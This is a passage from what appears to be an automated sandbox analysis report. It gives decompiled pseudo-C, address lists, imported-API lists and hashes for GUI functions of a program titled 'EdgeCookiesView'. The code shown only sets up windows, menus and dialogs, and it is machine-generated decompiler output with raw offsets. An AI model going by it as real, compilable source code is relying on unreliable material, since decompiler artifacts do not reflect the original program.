				_v0 = _a12 + 0x10;
				do {
					if(GetTextExtentPoint32W(_a16,  *_v0, wcslen( *_v0),  &_a116) != 0) {
						_t232 = _a100.x + 0xa;
						if(_t232 > _v8) {
							_v8 = _t232;
						}
					}
					_a16 =  &(_a16->i);
					_v16 = _v16 + 0x14;
				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)));
				_t220 = _v8;
				goto L8;
			}


























                                                                                                                                                0x0040d12c
                                                                                                                                                0x0040d12f
                                                                                                                                                0x0040d137
                                                                                                                                                0x0040d155
                                                                                                                                                0x0040d163
                                                                                                                                                0x0040d170
                                                                                                                                                0x0040d17c
                                                                                                                                                0x0040d185
                                                                                                                                                0x0040d191
                                                                                                                                                0x0040d19d
                                                                                                                                                0x0040d1a7
                                                                                                                                                0x0040d1b2
                                                                                                                                                0x0040d1c6
                                                                                                                                                0x0040d1d4
                                                                                                                                                0x0040d1e5
                                                                                                                                                0x0040d1e9
                                                                                                                                                0x0040d1ee
                                                                                                                                                0x0040d1fd
                                                                                                                                                0x0040d209
                                                                                                                                                0x0040d20d
                                                                                                                                                0x0040d215
                                                                                                                                                0x0040d219
                                                                                                                                                0x0040d2b1
                                                                                                                                                0x0040d2b4
                                                                                                                                                0x0040d2c0
                                                                                                                                                0x0040d3d1
                                                                                                                                                0x0040d3d6
                                                                                                                                                0x0040d3e2
                                                                                                                                                0x0040d3e6
                                                                                                                                                0x0040d3f4
                                                                                                                                                0x0040d40b
                                                                                                                                                0x0040d415
                                                                                                                                                0x0040d45b
                                                                                                                                                0x0040d465
                                                                                                                                                0x0040d4a4
                                                                                                                                                0x0040d4a4
                                                                                                                                                0x0040d2d1
                                                                                                                                                0x0040d2e2
                                                                                                                                                0x0040d2e6
                                                                                                                                                0x0040d2ea
                                                                                                                                                0x0040d2f2
                                                                                                                                                0x0040d323
                                                                                                                                                0x0040d352
                                                                                                                                                0x0040d36e
                                                                                                                                                0x0040d373
                                                                                                                                                0x0040d382
                                                                                                                                                0x0040d3a0
                                                                                                                                                0x0040d3b1
                                                                                                                                                0x0040d3b6
                                                                                                                                                0x0040d3ba
                                                                                                                                                0x0040d3c5
                                                                                                                                                0x00000000
                                                                                                                                                0x0040d2ea
                                                                                                                                                0x0040d222
                                                                                                                                                0x0040d224
                                                                                                                                                0x0040d22e
                                                                                                                                                0x0040d232
                                                                                                                                                0x0040d298
                                                                                                                                                0x0040d29c
                                                                                                                                                0x0040d2a1
                                                                                                                                                0x0040d2a5
                                                                                                                                                0x0040d2a9
                                                                                                                                                0x0040d2ab
                                                                                                                                                0x00000000
                                                                                                                                                0x0040d2ab
                                                                                                                                                0x0040d23b
                                                                                                                                                0x0040d23f
                                                                                                                                                0x0040d266
                                                                                                                                                0x0040d26f
                                                                                                                                                0x0040d276
                                                                                                                                                0x0040d278
                                                                                                                                                0x0040d278
                                                                                                                                                0x0040d276
                                                                                                                                                0x0040d27c
                                                                                                                                                0x0040d287
                                                                                                                                                0x0040d28c
                                                                                                                                                0x0040d294
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32 ref: 0040D159
                                                                                                                                                • GetDlgItem.USER32 ref: 0040D165
                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0040D174
                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0040D180
                                                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0040D189
                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0040D195
                                                                                                                                                • GetWindowRect.USER32 ref: 0040D1A7
                                                                                                                                                • GetWindowRect.USER32 ref: 0040D1B2
                                                                                                                                                • MapWindowPoints.USER32 ref: 0040D1C6
                                                                                                                                                • MapWindowPoints.USER32 ref: 0040D1D4
                                                                                                                                                • GetDC.USER32 ref: 0040D20D
                                                                                                                                                • wcslen.MSVCRT ref: 0040D24D
                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0040D25E
                                                                                                                                                • ReleaseDC.USER32 ref: 0040D2AB
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040D36E
                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 0040D382
                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 0040D3A0
                                                                                                                                                • GetDlgItem.USER32 ref: 0040D3D6
                                                                                                                                                • GetWindowRect.USER32 ref: 0040D3E6
                                                                                                                                                • MapWindowPoints.USER32 ref: 0040D3F4
                                                                                                                                                • GetClientRect.USER32 ref: 0040D40B
                                                                                                                                                • GetWindowRect.USER32 ref: 0040D415
                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040D45B
                                                                                                                                                • GetClientRect.USER32 ref: 0040D465
                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040D49D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                • API String ID: 2080319088-3046471546
                                                                                                                                                • Opcode ID: c102a7a5600ef86d24e901ec56d59f6fa3db94701319a0c7660b80572fc7c6b1
                                                                                                                                                • Instruction ID: af222cd68e1cf1c2961fcc0c9276d13d323a9bd1d9fa968012e99cc026c1ed94
                                                                                                                                                • Opcode Fuzzy Hash: c102a7a5600ef86d24e901ec56d59f6fa3db94701319a0c7660b80572fc7c6b1
                                                                                                                                                • Instruction Fuzzy Hash: D4B1C171508301AFD720DFA8C985E6BBBF9FF88714F00492DF695962A1D775E8088F16
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040A742, Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 303windowregistryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                			E0040A742(void* __ecx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __esi;
				struct HMENU__* _t123;
				struct HWND__* _t125;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t139;
				void* _t187;
				long _t193;
				void* _t198;
				void* _t200;
				void* _t216;
				long _t218;
				intOrPtr _t220;
				intOrPtr _t221;
				void* _t222;
				int _t225;
				void* _t226;
				intOrPtr* _t228;
				intOrPtr* _t229;
				void* _t231;
				void* _t232;
				intOrPtr* _t233;
				long _t241;

				_t229 = _t231 - 0x78;
				_t232 = _t231 - 0xa4;
				 *((char*)(_t229 - 0x23)) = 1;
				_t187 = __ecx;
				 *(_t229 - 0x2c) = 0;
				 *((intOrPtr*)(_t229 - 0x28)) = 0;
				 *((char*)(_t229 - 0x24)) = 0;
				 *((char*)(_t229 - 0x22)) = 0;
				 *((char*)(_t229 - 0x21)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t229 - 0x18) = 1;
				 *((intOrPtr*)(_t229 - 0x14)) = 0x9c41;
				 *((char*)(_t229 - 0x10)) = 4;
				 *((char*)(_t229 - 0xf)) = 0;
				 *((char*)(_t229 - 0xe)) = 0;
				 *((char*)(_t229 - 0xd)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 - 4)) = 5;
				 *_t229 = 0x9c44;
				 *((char*)(_t229 + 4)) = 4;
				 *((char*)(_t229 + 5)) = 0;
				 *((char*)(_t229 + 6)) = 0;
				 *((char*)(_t229 + 7)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t229 + 0x10) = 2;
				 *((intOrPtr*)(_t229 + 0x14)) = 0x9c48;
				 *((char*)(_t229 + 0x18)) = 4;
				 *((char*)(_t229 + 0x19)) = 0;
				 *((char*)(_t229 + 0x1a)) = 0;
				 *((char*)(_t229 + 0x1b)) = 0;
				 *(_t229 + 0x68) =  *(_t229 + 0x68) | 0xffffffff;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 + 0x24)) = 3;
				 *((intOrPtr*)(_t229 + 0x28)) = 0x9c49;
				 *((char*)(_t229 + 0x2c)) = 4;
				 *((char*)(_t229 + 0x2d)) = 0;
				 *((char*)(_t229 + 0x2e)) = 0;
				 *((char*)(_t229 + 0x2f)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 + 0x38)) = 0;
				 *((intOrPtr*)(_t229 + 0x3c)) = 0x9c4e;
				 *((char*)(_t229 + 0x40)) = 4;
				 *((char*)(_t229 + 0x41)) = 0;
				 *((char*)(_t229 + 0x42)) = 0;
				 *((char*)(_t229 + 0x43)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 + 0x4c)) = 4;
				 *((intOrPtr*)(_t229 + 0x50)) = 0x9c42;
				 *((char*)(_t229 + 0x54)) = 4;
				 *((char*)(_t229 + 0x55)) = 0;
				 *((char*)(_t229 + 0x56)) = 0;
				 *((char*)(_t229 + 0x57)) = 0;
				asm("stosd");
				_t216 = 0x66;
				asm("stosd");
				_t123 = E00406AFA(_t216);
				 *(__ecx + 0x21c) = _t123;
				SetMenu( *(__ecx + 0x208), _t123);
				_t125 = CreateStatusWindowW(0x50000000, 0x40f454,  *(_t187 + 0x208), 0x101);
				 *(_t187 + 0x214) = _t125;
				SendMessageW(_t125, 0x404, 1, _t229 + 0x68);
				 *(_t187 + 0x218) = CreateToolbarEx( *(_t187 + 0x208), 0x50010900, 0x102, 6, 0, E00405F82(), _t229 - 0x2c, 7, 0x10, 0x10, 0x60, 0x10, 0x14);
				 *(_t229 + 0x74) = ImageList_Create(0x10, 0x10, 0x18, 0, 1);
				_t131 = E00402DE1(__fp0);
				 *(_t229 + 0x70) = _t131;
				ImageList_Add( *(_t229 + 0x74), _t131, 0);
				DeleteObject( *(_t229 + 0x70));
				SendMessageW( *(_t187 + 0x218), 0x436, 0,  *(_t229 + 0x74));
				_t135 =  *((intOrPtr*)(_t187 + 0x69c));
				_t236 =  *((intOrPtr*)(_t135 + 0x2f4));
				_t218 = 0x50810809;
				if( *((intOrPtr*)(_t135 + 0x2f4)) != 0) {
					_t218 = 0x50811809;
				}
				E00401EA3( *((intOrPtr*)(_t187 + 0x69c)), _t236, CreateWindowExW(0, L"SysListView32", 0, _t218, 0, 0, 0x190, 0xc8,  *(_t187 + 0x208), 0x103, GetModuleHandleW(0), 0), 1);
				_t139 =  *((intOrPtr*)(_t187 + 0x69c));
				_t193 =  *(_t139 + 0x2e0);
				_t220 =  *((intOrPtr*)(_t139 + 0x2e4));
				 *(_t229 + 0x70) =  *(_t139 + 0x2ac);
				if(_t193 <= 0) {
					L5:
					 *( *((intOrPtr*)(_t187 + 0x69c)) + 0x340) =  *(_t187 + 0x214);
					_t221 =  *((intOrPtr*)(_t187 + 0x69c));
					E004099C4(_t221);
					ImageList_ReplaceIcon( *(_t221 + 0x2b4), 0, LoadIconW(GetModuleHandleW(0), 0x66));
					_t222 = 0x68;
					 *((intOrPtr*)(_t187 + 0x278)) = E00406AFA(_t222);
					 *(_t187 + 0x27c) = 0 | E004065C4( *((intOrPtr*)(_t187 + 0x6c0)), L"/nosaveload") >= 0x00000000;
					E0040B147(_t187, E004065C4( *((intOrPtr*)(_t187 + 0x6c0)), L"/nosaveload") >= 0, 0);
					memcpy(_t187 + 0x744,  &(( *(_t187 + 0x698))[0x8a]), 0x200c);
					_t233 = _t232 + 0xc;
					E00401500(_t187 + 0x6c4, 0x72,  *(_t187 + 0x208));
					asm("sbb eax, eax");
					ShowWindow( *(_t187 + 0x6d4),  ~(( *(_t187 + 0x698))[0x89]) & 0x00000005);
					 *( *(_t187 + 0x698)) = 1;
					E004077CB( *((intOrPtr*)(_t187 + 0x69c)));
					_t241 =  *0x4134e0; // 0x0
					if(_t241 == 0) {
						E00405812(0x4134e0);
						if((GetFileAttributesW(0x4134e0) & 0x00000001) != 0) {
							GetTempPathW(0x104, 0x4134e0);
						}
					}
					_t225 = wcslen(0x4134e0);
					 *_t233 = L"report.html";
					_t105 = wcslen(??) + 1; // 0x1
					_t243 = _t225 + _t105 - 0x104;
					if(_t225 + _t105 >= 0x104) {
						 *((short*)(_t187 + 0x288)) = 0;
					} else {
						E00405930(_t187 + 0x288, 0x4134e0, L"report.html");
					}
					_t198 = 0x30;
					E00409BA7( *((intOrPtr*)(_t187 + 0x69c)), _t198);
					_t226 = _t187;
					E0040A6FF(_t226);
					E00405D0F( *(_t187 + 0x214), 0x2000000);
					_t200 = 1;
					 *((intOrPtr*)(_t187 + 0x6a0)) = RegisterWindowMessageW(L"commdlg_FindReplace");
					E0040A1DC(0, _t200, _t226, _t243);
					 *(_t229 + 0x60) = 0x12c;
					 *((intOrPtr*)(_t229 + 0x64)) = 0x400;
					SendMessageW( *(_t226 + 0x214), 0x404, 2, _t229 + 0x60);
					SendMessageW( *(_t226 + 0x214), 0x40b, 0x1001, 0);
					return E00401BDC(_t226, 0x415);
				} else {
					_t228 = _t220 + 0xc;
					 *(_t229 + 0x74) = _t193;
					do {
						E00402842( *((intOrPtr*)(_t228 + 4)),  *((intOrPtr*)(_t228 - 8)),  *(_t229 + 0x70),  *((intOrPtr*)(_t228 - 0xc)),  *((intOrPtr*)(_t228 - 4)),  *_t228);
						_t232 = _t232 + 0x10;
						_t228 = _t228 + 0x14;
						_t81 = _t229 + 0x74;
						 *_t81 =  *(_t229 + 0x74) - 1;
					} while ( *_t81 != 0);
					goto L5;
				}
			}



























                                                                                                                                                0x0040a743
                                                                                                                                                0x0040a747
                                                                                                                                                0x0040a74d
                                                                                                                                                0x0040a756
                                                                                                                                                0x0040a75a
                                                                                                                                                0x0040a75d
                                                                                                                                                0x0040a760
                                                                                                                                                0x0040a763
                                                                                                                                                0x0040a766
                                                                                                                                                0x0040a76c
                                                                                                                                                0x0040a76d
                                                                                                                                                0x0040a76e
                                                                                                                                                0x0040a775
                                                                                                                                                0x0040a77c
                                                                                                                                                0x0040a780
                                                                                                                                                0x0040a783
                                                                                                                                                0x0040a786
                                                                                                                                                0x0040a78e
                                                                                                                                                0x0040a78f
                                                                                                                                                0x0040a790
                                                                                                                                                0x0040a797
                                                                                                                                                0x0040a79e
                                                                                                                                                0x0040a7a2
                                                                                                                                                0x0040a7a5
                                                                                                                                                0x0040a7a8
                                                                                                                                                0x0040a7b0
                                                                                                                                                0x0040a7b1
                                                                                                                                                0x0040a7b2
                                                                                                                                                0x0040a7b9
                                                                                                                                                0x0040a7c0
                                                                                                                                                0x0040a7c4
                                                                                                                                                0x0040a7c7
                                                                                                                                                0x0040a7ca
                                                                                                                                                0x0040a7cf
                                                                                                                                                0x0040a7d6
                                                                                                                                                0x0040a7d7
                                                                                                                                                0x0040a7d8
                                                                                                                                                0x0040a7df
                                                                                                                                                0x0040a7e6
                                                                                                                                                0x0040a7ea
                                                                                                                                                0x0040a7ed
                                                                                                                                                0x0040a7f0
                                                                                                                                                0x0040a7f8
                                                                                                                                                0x0040a7f9
                                                                                                                                                0x0040a7fa
                                                                                                                                                0x0040a7fd
                                                                                                                                                0x0040a804
                                                                                                                                                0x0040a808
                                                                                                                                                0x0040a80b
                                                                                                                                                0x0040a80e
                                                                                                                                                0x0040a816
                                                                                                                                                0x0040a817
                                                                                                                                                0x0040a818
                                                                                                                                                0x0040a81f
                                                                                                                                                0x0040a826
                                                                                                                                                0x0040a82a
                                                                                                                                                0x0040a82d
                                                                                                                                                0x0040a830
                                                                                                                                                0x0040a838
                                                                                                                                                0x0040a83b
                                                                                                                                                0x0040a83c
                                                                                                                                                0x0040a83d
                                                                                                                                                0x0040a842
                                                                                                                                                0x0040a84f
                                                                                                                                                0x0040a86a
                                                                                                                                                0x0040a882
                                                                                                                                                0x0040a888
                                                                                                                                                0x0040a8c4
                                                                                                                                                0x0040a8d0
                                                                                                                                                0x0040a8d3
                                                                                                                                                0x0040a8dd
                                                                                                                                                0x0040a8e0
                                                                                                                                                0x0040a8e9
                                                                                                                                                0x0040a8fe
                                                                                                                                                0x0040a900
                                                                                                                                                0x0040a906
                                                                                                                                                0x0040a90c
                                                                                                                                                0x0040a911
                                                                                                                                                0x0040a913
                                                                                                                                                0x0040a913
                                                                                                                                                0x0040a94f
                                                                                                                                                0x0040a954
                                                                                                                                                0x0040a95a
                                                                                                                                                0x0040a962
                                                                                                                                                0x0040a96e
                                                                                                                                                0x0040a971
                                                                                                                                                0x0040a99a
                                                                                                                                                0x0040a9a6
                                                                                                                                                0x0040a9ac
                                                                                                                                                0x0040a9b4
                                                                                                                                                0x0040a9d1
                                                                                                                                                0x0040a9d9
                                                                                                                                                0x0040a9ea
                                                                                                                                                0x0040a9ff
                                                                                                                                                0x0040aa05
                                                                                                                                                0x0040aa22
                                                                                                                                                0x0040aa27
                                                                                                                                                0x0040aa39
                                                                                                                                                0x0040aa4c
                                                                                                                                                0x0040aa58
                                                                                                                                                0x0040aa64
                                                                                                                                                0x0040aa70
                                                                                                                                                0x0040aa75
                                                                                                                                                0x0040aa81
                                                                                                                                                0x0040aa83
                                                                                                                                                0x0040aa91
                                                                                                                                                0x0040aa99
                                                                                                                                                0x0040aa99
                                                                                                                                                0x0040aa91
                                                                                                                                                0x0040aaa5
                                                                                                                                                0x0040aaa7
                                                                                                                                                0x0040aab3
                                                                                                                                                0x0040aab7
                                                                                                                                                0x0040aabd
                                                                                                                                                0x0040aad8
                                                                                                                                                0x0040aabf
                                                                                                                                                0x0040aacf
                                                                                                                                                0x0040aad5
                                                                                                                                                0x0040aae9
                                                                                                                                                0x0040aaea
                                                                                                                                                0x0040aaef
                                                                                                                                                0x0040aaf1
                                                                                                                                                0x0040ab01
                                                                                                                                                0x0040ab07
                                                                                                                                                0x0040ab13
                                                                                                                                                0x0040ab1b
                                                                                                                                                0x0040ab37
                                                                                                                                                0x0040ab3e
                                                                                                                                                0x0040ab45
                                                                                                                                                0x0040ab58
                                                                                                                                                0x0040ab6d
                                                                                                                                                0x0040a973
                                                                                                                                                0x0040a973
                                                                                                                                                0x0040a976
                                                                                                                                                0x0040a979
                                                                                                                                                0x0040a98a
                                                                                                                                                0x0040a98f
                                                                                                                                                0x0040a992
                                                                                                                                                0x0040a995
                                                                                                                                                0x0040a995
                                                                                                                                                0x0040a995
                                                                                                                                                0x00000000
                                                                                                                                                0x0040a979

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406AFA: LoadMenuW.USER32 ref: 00406B02
                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 0040A84F
                                                                                                                                                • CreateStatusWindowW.COMCTL32(50000000,0040F454,?,00000101), ref: 0040A86A
                                                                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040A888
                                                                                                                                                  • Part of subcall function 00405F82: GetModuleHandleW.KERNEL32(00000000), ref: 00405F8E
                                                                                                                                                  • Part of subcall function 00405F82: LoadImageW.USER32 ref: 00405F9F
                                                                                                                                                  • Part of subcall function 00405F82: GetObjectW.GDI32(?,00000018,?), ref: 00405FBE
                                                                                                                                                  • Part of subcall function 00405F82: CreateCompatibleDC.GDI32(00000000), ref: 00405FC5
                                                                                                                                                  • Part of subcall function 00405F82: SelectObject.GDI32(00000000,?), ref: 00405FD1
                                                                                                                                                  • Part of subcall function 00405F82: GetSysColor.USER32(0000000F), ref: 00405FDC
                                                                                                                                                  • Part of subcall function 00405F82: GetPixel.GDI32(00000000,00000000,00000000), ref: 00405FEE
                                                                                                                                                  • Part of subcall function 00405F82: GetPixel.GDI32(00000000,?,?), ref: 0040600A
                                                                                                                                                  • Part of subcall function 00405F82: SetPixel.GDI32(00000000,?,?,?), ref: 0040601B
                                                                                                                                                  • Part of subcall function 00405F82: SelectObject.GDI32(00000000,?), ref: 0040603B
                                                                                                                                                  • Part of subcall function 00405F82: DeleteDC.GDI32(00000000), ref: 00406042
                                                                                                                                                • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040A8B5
                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000018,00000000,00000001), ref: 0040A8CA
                                                                                                                                                  • Part of subcall function 00402DE1: GetModuleHandleW.KERNEL32(00000000,0000006E,00000000,00000000,00000000,00001060), ref: 00402DFA
                                                                                                                                                  • Part of subcall function 00402DE1: LoadImageW.USER32 ref: 00402E01
                                                                                                                                                  • Part of subcall function 00402DE1: GetObjectW.GDI32(?,00000018,?), ref: 00402E25
                                                                                                                                                  • Part of subcall function 00402DE1: CreateCompatibleDC.GDI32(00000000), ref: 00402E2C
                                                                                                                                                  • Part of subcall function 00402DE1: SelectObject.GDI32(00000000,?), ref: 00402E39
                                                                                                                                                  • Part of subcall function 00402DE1: GetSysColor.USER32(0000000F), ref: 00402E45
                                                                                                                                                  • Part of subcall function 00402DE1: GetPixel.GDI32(00000000,00000000,00000000), ref: 00402E58
                                                                                                                                                  • Part of subcall function 00402DE1: GetPixel.GDI32(00000000,?,?), ref: 00402E83
                                                                                                                                                  • Part of subcall function 00402DE1: SetPixel.GDI32(00000000,?,?,?), ref: 00402F00
                                                                                                                                                  • Part of subcall function 00402DE1: SelectObject.GDI32(00000000,?), ref: 00402F2F
                                                                                                                                                  • Part of subcall function 00402DE1: DeleteDC.GDI32(00000000), ref: 00402F36
                                                                                                                                                • ImageList_Add.COMCTL32(?,00000000,00000000), ref: 0040A8E0
                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040A8E9
                                                                                                                                                • SendMessageW.USER32(?,00000436,00000000,?), ref: 0040A8FE
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040A919
                                                                                                                                                • CreateWindowExW.USER32 ref: 0040A940
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,00000001), ref: 0040A9BA
                                                                                                                                                • LoadIconW.USER32(00000000,00000066), ref: 0040A9C3
                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9D1
                                                                                                                                                • memcpy.MSVCRT ref: 0040AA22
                                                                                                                                                • ShowWindow.USER32(?,?), ref: 0040AA58
                                                                                                                                                • GetFileAttributesW.KERNEL32(004134E0), ref: 0040AA89
                                                                                                                                                • GetTempPathW.KERNEL32(00000104,004134E0), ref: 0040AA99
                                                                                                                                                • wcslen.MSVCRT ref: 0040AAA0
                                                                                                                                                • wcslen.MSVCRT ref: 0040AAAE
                                                                                                                                                • RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001), ref: 0040AB0D
                                                                                                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 0040AB45
                                                                                                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040AB58
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Object$CreatePixel$ImageMessage$HandleLoadModuleSelectSendWindow$DeleteList_$ColorCompatibleIconMenuwcslen$AttributesFilePathRegisterReplaceShowStatusTempToolbarmemcpy
                                                                                                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$4A
                                                                                                                                                • API String ID: 945479791-4224175941
                                                                                                                                                • Opcode ID: 04a5916b9d1b1c31dadef9f7ad9415178030fb231d71024c6285b7e26b69c7e2
                                                                                                                                                • Instruction ID: ef4bcdae66b01cb0e556df410aa057252edbff8cd3310fcf9c61045b6203d9f2
                                                                                                                                                • Opcode Fuzzy Hash: 04a5916b9d1b1c31dadef9f7ad9415178030fb231d71024c6285b7e26b69c7e2
                                                                                                                                                • Instruction Fuzzy Hash: 35C1C271640344AFEB21DF64CC89FDA3BA5AF54304F04447AFE48AB2A2C7B59844CB69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004010C7, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                			E004010C7(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x412f50;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x412f50);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"EdgeCookiesView");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00405B17(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x412fd0;
								if( *0x412fd0 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x412fd0;
									if( *0x412fd0 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x412fd0;
										if( *0x412fd0 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x412fd0);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00405CD2();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                                                                                                0x004010c7
                                                                                                                                                0x004010ca
                                                                                                                                                0x004010cb
                                                                                                                                                0x004010cf
                                                                                                                                                0x004010d7
                                                                                                                                                0x004010d9
                                                                                                                                                0x004012a4
                                                                                                                                                0x004012ac
                                                                                                                                                0x004012e7
                                                                                                                                                0x004012ae
